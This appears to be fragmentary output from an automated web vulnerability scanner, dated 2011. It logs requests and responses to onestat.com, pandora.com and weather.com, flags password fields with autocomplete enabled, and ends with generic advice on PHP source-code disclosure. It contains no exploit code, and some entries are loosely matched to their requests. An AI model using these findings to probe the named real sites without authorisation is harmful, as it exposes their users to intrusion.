MemberLoginCompact1$Login1$Password
Request
GET / HTTP/1.1 Host: www.onestat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 02:31:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=wdsxsqfwe5o3umirakad3355; path=/; HttpOnly Set-Cookie: UILanguage=en; expires=Sat, 09-Jan-2016 02:31:56 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 19494
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> OneStat.com We ...[SNIP]... <div class="container"> <form name="form1" method="post" action="Default.aspx" id="form1"> <div> ...[SNIP]... <td><input name="MemberLoginCompact1$Login1$Password" type="password" id="MemberLoginCompact1_Login1_Password" class="login" /></td> ...[SNIP]...
The page contains a form with the following action URL:
https://www.pandora.com/login.vm
The form contains the following password field with autocomplete enabled:
login_password
Request
GET /people/ HTTP/1.1 Host: www.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:20:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 13116
<html>
<head>
<title>Pandora Radio - Listen to Free Internet Radio, Find New Music</title>
The page contains a form with the following action URL:
https://registration.weather.com/ursa/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /weather/local/48617 HTTP/1.1 Host: www.weather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
https://registration.weather.com/ursa/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /weather/local/48858 HTTP/1.1 Host: www.weather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
https://registration.weather.com/ursa/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /weather/local/48879 HTTP/1.1 Host: www.weather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
https://registration.weather.com/ursa/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /weather/local/USMI0020 HTTP/1.1 Host: www.weather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The application appears to disclose some server-side source code written in PHP.
Issue background
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.